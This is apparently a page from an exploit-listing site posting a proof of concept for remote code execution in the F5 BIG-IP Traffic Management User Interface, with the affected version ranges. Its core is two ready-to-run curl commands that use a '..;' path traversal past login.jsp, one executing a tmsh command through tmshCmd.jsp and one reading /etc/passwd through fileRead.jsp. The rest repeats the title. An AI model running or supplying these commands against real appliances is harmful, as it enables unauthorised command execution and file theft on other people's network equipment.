bigip 15.0.0 < 15.1.0.3 14.1.0 < 14.1.2.5 13.1.0 < 13.1.3.3 12.1.0 < 12.1.5.1 11.6.1 < 11.6.5.1 traffic management user interface tmuiremote code execution (poc)
▸▸▸ Exploit & Vulnerability >> webapps exploit & linux vulnerability
## RCE: curl -v -k 'https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin' ## Read File: curl -v -k 'https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd'
Bigip 15.0.0 < 15.1.0.3 14.1.0 < 14.1.2.5 13.1.0 < 13.1.3.3 12.1.0 < 12.1.5.1 11.6.1 < 11.6.5.1 traffic management user interface tmuiremote code execution (poc) Vulnerability / Exploit Source : Bigip 15.0.0 < 15.1.0.3 14.1.0 < 14.1.2.5 13.1.0 < 13.1.3.3 12.1.0 < 12.1.5.1 11.6.1 < 11.6.5.1 traffic management user interface tmuiremote code execution (poc)